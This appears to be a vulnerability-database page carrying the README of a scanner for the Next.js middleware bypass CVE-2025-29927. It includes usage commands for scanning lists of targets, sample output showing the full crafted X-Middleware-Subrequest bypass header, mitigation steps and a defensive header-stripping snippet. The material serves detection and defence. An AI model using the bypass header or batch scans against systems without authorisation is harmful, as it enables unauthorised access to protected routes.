Related vulnerabilities
Description
Next.js Middleware Bypass Scanne
Introduction
# CVE-2025-29927
## Next.js Middleware Bypass Scanner (CVE-2025-29927)
CVE-2025-29927 is a specialized security tool for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927) affecting Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls by sending a specially crafted HTTP header.
## About the Vulnerability
The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending a malicious `X-Middleware-Subrequest` header that confuses the middleware processing logic. This can lead to unauthorized access to protected resources and routes.
**CVSS Score:** 9.1 (Critical)
## Features
- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing
## Installation
```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
```
## Usage
```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```
### Command Line Arguments
- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets
### Examples
Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```
Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```
Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```
Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```
Scan with a custom header:
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```
## Output
For vulnerable targets, MiddleWay displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation
Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```
## Mitigation
To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25, 15.2.3 or later
2. If upgrading is not possible, block the `X-Middleware-Subrequest` header at your WAF or server level
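One way to apply mitigation 2 at the server level is sketched below. It is an added example, not code from this repository or from Next.js, and it assumes a custom Node.js server whose `(req, res)` handler can be wrapped before requests reach the Next.js request handler. The names `guard`, `stripBlockedHeader` and `demo` are hypothetical, and the request objects are constructed.

```javascript
// Added example: drop or reject X-Middleware-Subrequest at the server edge.
const BLOCKED = 'x-middleware-subrequest';

// Remove the header from the parsed map and from the raw name/value list.
// Returns true when the request carried it, in any letter case.
function stripBlockedHeader(req) {
  let seen = false;
  for (const name of Object.keys(req.headers)) {
    if (name.toLowerCase() === BLOCKED) {
      delete req.headers[name];
      seen = true;
    }
  }
  const raw = Array.isArray(req.rawHeaders) ? req.rawHeaders : [];
  const kept = [];
  for (let i = 0; i + 1 < raw.length; i += 2) {
    if (raw[i].toLowerCase() === BLOCKED) seen = true;
    else kept.push(raw[i], raw[i + 1]);
  }
  req.rawHeaders = kept;
  return seen;
}

// Wrap any (req, res) handler. reject=true answers 400; reject=false strips
// the header and lets the request continue. Every hit is passed to log().
function guard(handler, { reject = true, log = () => {} } = {}) {
  return function guarded(req, res) {
    if (stripBlockedHeader(req)) {
      log({ event: 'blocked-header', header: BLOCKED, url: req.url });
      if (reject) {
        res.statusCode = 400;
        res.end('Bad Request');
        return undefined;
      }
    }
    return handler(req, res);
  };
}

// Constructed request shaped like Node's http.IncomingMessage (strip mode).
function demo() {
  const events = [];
  const app = (req) => Object.keys(req.headers);
  const req = {
    url: '/admin',
    headers: { host: 'app.example', 'X-Middleware-Subrequest': 'constructed' },
    rawHeaders: ['Host', 'app.example', 'X-Middleware-Subrequest', 'constructed'],
  };
  const seenByApp = guard(app, { reject: false, log: (e) => events.push(e) })(req, {});
  return { seenByApp, events, rawHeaders: req.rawHeaders };
}
```

Passing a `log` callback gives a record of every request that arrived with the header, which is useful evidence of probing even after the upgrade in step 1 has been applied.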
## Disclaimer
This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.
## License
MIT
File snapshot
[4.0K] /data/pocs/538006495b78c43a07acbba493be1aecbc2a26e4
├── [7.4K] CVE-2025-29927.py
├── [3.0K] README.md
└── [ 60] requirements.txt
0 directories, 3 files